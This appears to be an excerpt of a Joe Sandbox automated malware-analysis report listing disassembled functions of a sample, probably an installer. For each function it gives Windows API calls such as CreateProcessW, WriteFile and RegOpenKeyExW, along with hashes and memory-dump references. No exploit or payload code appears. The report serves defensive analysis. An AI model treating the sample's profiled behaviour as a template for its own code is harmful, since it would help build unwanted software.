                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1375471231-0
                                                                                                                                                                                      • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                                                                                                                                                      • Instruction ID: 8c4969e502f5bc4c8dfdefb7e9c2ba363b64d1215f12130c86bef4ebeef6f559
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 19C08C30310902DACA802B209F087173960AB80340F158439A683E00B4CA30A065C92D
                                                                                                                                                                                      Function 004060CA Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E7,00000000,00000000,0040330B,000000FF,00000004,00000000,00000000,00000000), ref: 004060DE
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                                      • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                                                                                                                                      • Instruction ID: a77d82ba430c16999eb1f2306cb11816df14181100402a9e04059793f1b3015d
                                                                                                                                                                                      • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                                                                                                                                      • Instruction Fuzzy Hash: 21E08632150219ABCF10DF948C00EEB3B9CFF04390F018436FD11E3040D630E92197A4
                                                                                                                                                                                      Function 004060F9 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040349D,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 0040610D
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FileWrite
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3934441357-0
                                                                                                                                                                                      • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                                                                                                                                      • Instruction ID: 78408803ccc59d93ae5352641a5e7b8f709900c8df5e8e9e13d69f82a1dcf02f
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8FE08C3220021ABBCF109E908C00EEB3FACEB003A0F014432FA26E6050D670E83097A4
                                                                                                                                                                                      Function 004023F9 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040242A
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: PrivateProfileString
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1096422788-0
                                                                                                                                                                                      • Opcode ID: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
                                                                                                                                                                                      • Instruction ID: 816608b18dc0c520cd9a71caba4f9b5dbdb35d60be0fcf423de44464aa3a4457
                                                                                                                                                                                      • Opcode Fuzzy Hash: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
                                                                                                                                                                                      • Instruction Fuzzy Hash: 95E04F31800229BEDB00EFA0CD09DAD3678AF40304F00093EF510BB0D1E7FC49519749
                                                                                                                                                                                      Function 004063C4 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000000,?,00406452,?,?,?,?,: Completed,?,00000000), ref: 004063E8
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Open
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 71445658-0
                                                                                                                                                                                      • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                                                                                                                                                      • Instruction ID: e31b8ecfa4924c4a0859a1c58e61cb12282203f41ec30ad4fda9f6d7c72ae418
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                                                                                                                                                      • Instruction Fuzzy Hash: 68D0123200020DBBDF115E91ED01FAB3B1DAB08310F014426FE16E5091D776D570A764
                                                                                                                                                                                      Function 004015A8 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015B3
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                      • Opcode ID: bd9eef0ddba76f96e5ede74a4073dc30a0544dd5bf06428a66fa2d1577afb889
                                                                                                                                                                                      • Instruction ID: b7b437a2ec26925c6232407c7e58ab903e49824199ec6a3f71ab3ccdd8f320e3
                                                                                                                                                                                      • Opcode Fuzzy Hash: bd9eef0ddba76f96e5ede74a4073dc30a0544dd5bf06428a66fa2d1577afb889
                                                                                                                                                                                      • Instruction Fuzzy Hash: 81D05B72B08104DBDB01DBE8EA48A9E73B4DB50338B21893BD111F11D0D7B8C545A71D
                                                                                                                                                                                      Function 00404522 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404534
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                                      • Opcode ID: 8dc2ea4a8cffd810c80330d43262312fa0f844130cc7d84a637c392e617d0b66
                                                                                                                                                                                      • Instruction ID: 7d988476d572be30e71f68111afb2513933db934ea5b2002f3fecefde51a3b0c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8dc2ea4a8cffd810c80330d43262312fa0f844130cc7d84a637c392e617d0b66
                                                                                                                                                                                      • Instruction Fuzzy Hash: ACC04C717402007BDA209F50AD49F07775467A0702F1494797341E51E0C674E550D61C
                                                                                                                                                                                      Function 0040450B Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                                      • Opcode ID: 5e23afa4ba150cac51e31494d2c9f0ee7f8efb4361c8cf2b7a73957f204a5961
                                                                                                                                                                                      • Instruction ID: 777369a795cbaa9bd4fd16da76cbada5404ff361b75e364c58eeef3f96c31ac9
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e23afa4ba150cac51e31494d2c9f0ee7f8efb4361c8cf2b7a73957f204a5961
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6BB09235181600AADA115B40DE09F867BA2E7A4701F029438B340640B0CBB210A0DB08
                                                                                                                                                                                      Function 004034EA Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403247,?), ref: 004034F8
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                                      • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                                                                                                                      • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                                                                                                                      • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                                                                                                                                                      Function 004044F8 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,004042CF), ref: 00404502
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CallbackDispatcherUser
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2492992576-0
                                                                                                                                                                                      • Opcode ID: faa9f1bbc6a73408ed15535010d366895e2d742fa65bef251b9024de670fa5bb
                                                                                                                                                                                      • Instruction ID: 186c68f4495094c0cebc3eb7279f68ffc90812dad8dfd9e689695b78415bb769
                                                                                                                                                                                      • Opcode Fuzzy Hash: faa9f1bbc6a73408ed15535010d366895e2d742fa65bef251b9024de670fa5bb
                                                                                                                                                                                      • Instruction Fuzzy Hash: 43A00176544A04ABCE12EB50EF4990ABB62BBA4B01B618879A285514388B325921EB19
                                                                                                                                                                                      Function 00401FA9 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 004055DC: lstrlenW.KERNEL32(antholite,00000000,00424620,762323A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                                                                                                                                                                        • Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,antholite,00000000,00424620,762323A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                                                                                                                                                                        • Part of subcall function 004055DC: lstrcatW.KERNEL32(antholite,0040341D,0040341D,antholite,00000000,00424620,762323A0), ref: 00405637
                                                                                                                                                                                        • Part of subcall function 004055DC: SetWindowTextW.USER32(antholite,antholite), ref: 00405649
                                                                                                                                                                                        • Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                                                                                                                                                                        • Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                                                                                                                                                                        • Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                                                                                                                                                                        • Part of subcall function 00405B3A: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?, Hype,e",?), ref: 00405B63
                                                                                                                                                                                        • Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?, Hype,e",?), ref: 00405B70
                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FF0
                                                                                                                                                                                        • Part of subcall function 004069F6: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406A07
                                                                                                                                                                                        • Part of subcall function 004069F6: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A29
                                                                                                                                                                                        • Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2972824698-0
                                                                                                                                                                                      • Opcode ID: 23aa4ee629d2d375094aa14ebaeeae63623eaa73686822291d3629d93c53ad1e
                                                                                                                                                                                      • Instruction ID: 72ab4701d282d41bfb99937ccb951c9b3d992b5a19319da95f503844dddfcbd3
                                                                                                                                                                                      • Opcode Fuzzy Hash: 23aa4ee629d2d375094aa14ebaeeae63623eaa73686822291d3629d93c53ad1e
                                                                                                                                                                                      • Instruction Fuzzy Hash: EEF0F032804015ABCB20BBA199849DE72B5CF00318B21413FE102B21D1C77C0E42AA6E

                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                      Function 004049C7 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetDlgItem.USER32(?,000003FB), ref: 00404A16
                                                                                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00404A40
                                                                                                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00404AF1
                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404AFC
                                                                                                                                                                                      • lstrcmpiW.KERNEL32(: Completed,0042CA68,00000000,?,?), ref: 00404B2E
                                                                                                                                                                                      • lstrcatW.KERNEL32(?,: Completed), ref: 00404B3A
                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B4C
                                                                                                                                                                                        • Part of subcall function 00405B9B: GetDlgItemTextW.USER32(?,?,00000400,00404B83), ref: 00405BAE
